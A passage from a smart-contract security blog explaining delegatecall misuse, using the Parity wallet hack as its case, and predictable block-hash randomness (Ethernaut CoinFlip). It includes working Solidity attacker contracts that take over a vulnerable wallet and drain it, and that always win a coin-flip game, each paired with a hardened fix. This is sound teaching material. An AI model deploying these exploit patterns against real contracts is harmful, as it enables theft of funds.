Monday, December 4, 2023

183: Delegatecall

 Delegatecall is a powerful low-level operation in Solidity (and in the EVM itself). A contract can use delegatecall to run code from another contract while preserving the caller's context: the callee's code executes against the calling contract's storage and balance, and msg.sender and msg.value are left unchanged. This is what makes patterns like upgradeable proxy contracts possible. It also demands extreme caution, because delegatecall has been the vector for several high-profile Ethereum hacks: whatever code is delegatecalled can read and write the calling contract's storage, so a storage-layout mismatch between the two contracts, or a callee function that should never have been reachable, is enough to compromise the caller. Using delegatecall as a catch-all forwarder of arbitrary calldata in a fallback function is especially unwise. That is exactly what allowed the attacker in the 2017 Parity multisig wallet hack to reach the library's initialization function through the wallet's fallback, overwrite the wallet's owners with his own address, and withdraw all of the funds.
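 The following is an added example, not code from the original post or from Parity; it mirrors the pattern described above with hypothetical contracts (WalletLibrary, VulnerableWallet, Attacker, HardenedWallet). The vulnerable wallet forwards any unknown selector to a library via delegatecall, so the library's one-time initializer can be re-run by anyone and rewrite slot 0 (the owner) of the wallet. The hardened wallet sets its owner directly and only forwards an explicit allowlist of selectors.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not the original post's or Parity's code). Contract names are hypothetical.

// Shared logic contract. It is meant to be executed via delegatecall, so every
// storage write below lands in the CALLER's storage at the same slot number.
contract WalletLibrary {
    address public owner; // slot 0: under delegatecall this is the caller's slot 0

    // Intended as a one-time initializer, but nothing enforces "one time".
    function initWallet(address _owner) public {
        owner = _owner;
    }

    function withdraw(address payable to, uint256 amount) public {
        require(msg.sender == owner, "not owner");
        to.transfer(amount); // sends from address(this), i.e. the calling wallet
    }
}

// Vulnerable wallet: blindly forwards every unknown call to the library.
contract VulnerableWallet {
    address public owner; // slot 0, lines up with WalletLibrary.owner
    address public lib;

    constructor(address _lib) {
        lib = _lib;
        owner = msg.sender;
    }

    receive() external payable {}

    // Any selector, including initWallet(address), runs with this contract's storage.
    fallback() external payable {
        (bool ok, ) = lib.delegatecall(msg.data);
        require(ok, "delegatecall failed");
    }
}

// Attacker: re-initialises the wallet with itself as owner, then drains it.
contract Attacker {
    receive() external payable {}

    function takeOver(address payable wallet) external {
        // Hits the fallback, which delegatecalls initWallet: owner (slot 0) becomes us.
        (bool ok, ) = wallet.call(abi.encodeWithSignature("initWallet(address)", address(this)));
        require(ok, "init failed");
        // msg.sender is preserved by delegatecall, so the owner check now passes.
        (ok, ) = wallet.call(
            abi.encodeWithSignature("withdraw(address,uint256)", address(this), wallet.balance)
        );
        require(ok, "withdraw failed");
    }
}

// Hardened wallet: owner is set in the constructor, never via delegatecall, and
// only an explicit allowlist of selectors may be forwarded to the library.
contract HardenedWallet {
    address public owner;                 // slot 0, still lines up with WalletLibrary.owner
    address public immutable lib;         // immutables take no storage slot
    mapping(bytes4 => bool) public forwardable;

    constructor(address _lib) {
        lib = _lib;
        owner = msg.sender;
        forwardable[WalletLibrary.withdraw.selector] = true; // initWallet is NOT forwardable
    }

    receive() external payable {}

    fallback() external payable {
        require(msg.data.length >= 4 && forwardable[bytes4(msg.data[:4])], "selector not forwardable");
        (bool ok, bytes memory ret) = lib.delegatecall(msg.data);
        if (!ok) {
            // bubble up the library's revert reason
            assembly { revert(add(ret, 32), mload(ret)) }
        }
    }
}
```

 Deploy WalletLibrary, then VulnerableWallet pointing at it, fund the wallet, and call Attacker.takeOver(wallet): the wallet's balance ends up in the Attacker contract. Against HardenedWallet the same call reverts with "selector not forwardable". Note that the allowlist is only half the fix: the storage layouts of the wallet and library must still be kept in lockstep, which is why proxy frameworks pin the slots they use.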

182: On Chain Randomness

 Blockchains are designed to be deterministic, with every interaction viewable and traceable. How, then, can we get randomness to use in our contracts? One might think we can read some value that isn't random but is hard to predict, like a block number or block hash, and run it through some algorithm to get our "random" number. This may seem clever, but an attacker can write their own smart contract that performs the same computation and predicts your random value before it is used, because both contracts see the same block data when they run in the same block. This is the vulnerability in OpenZeppelin's Ethernaut level 3 (CoinFlip), where a coin-flip game decides heads or tails from the hash of the previous block. The contract can be exploited by a second contract that calculates which way the coin will land using the exact same math, then submits the correct guess every time. This simple contract illustrates the challenge of consuming random data on-chain; keep in mind that even without a competing contract, the block producer has some influence over block-derived values. Various solutions exist, such as Chainlink VRF (Verifiable Random Function), which delivers a random value from an oracle together with a cryptographic proof that is verified on-chain before the value is handed to your contract.
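 Here is an added example, not code from the original post or from the Ethernaut project, that reproduces the flaw with two hypothetical contracts (PredictableCoinFlip and CoinFlipPredictor). The game takes the top bit of the previous block's hash as the coin; the predictor computes the same bit in the same block and only ever submits a winning guess.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not the original post's or Ethernaut's code). Contract names are hypothetical.

// Toy coin-flip game whose "randomness" is the previous block's hash.
contract PredictableCoinFlip {
    uint256 public consecutiveWins;
    uint256 private lastHash;
    uint256 private constant FACTOR = 2 ** 255; // splits the hash range into two halves

    function flip(bool guess) external returns (bool) {
        // blockhash(block.number - 1) is public: anyone in this block can read it.
        uint256 blockValue = uint256(blockhash(block.number - 1));
        require(blockValue != lastHash, "one flip per block");
        lastHash = blockValue;

        bool side = blockValue / FACTOR == 1; // true iff the top bit of the hash is set
        if (side == guess) {
            consecutiveWins++;
            return true;
        }
        consecutiveWins = 0;
        return false;
    }
}

// Attacker contract: runs in the same block as the flip, so it sees the same
// blockhash, computes the answer first, and calls flip() with it.
contract CoinFlipPredictor {
    PredictableCoinFlip public immutable target;

    constructor(PredictableCoinFlip _target) {
        target = _target;
    }

    // Identical computation to the game's: same input, same result.
    function predict() public view returns (bool) {
        return uint256(blockhash(block.number - 1)) / (2 ** 255) == 1;
    }

    // One call per block (the game rejects repeats); every call wins.
    function winOnce() external {
        require(target.flip(predict()), "prediction was wrong");
    }
}
```

 Calling winOnce() once per block drives consecutiveWins up without ever losing. No amount of hashing, multiplying or mixing in other block fields changes this, since the predictor can apply the same transformation; the fix is to take the randomness from something the caller cannot see or influence at submission time, such as an oracle-delivered value (Chainlink VRF) or a commit-reveal scheme where the guess is locked in before the entropy exists.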

190: Sablier

 The CodeHawks platform has an upcoming audit on the Sablier protocol, so I decided to read through the docs and familiarize myself with the...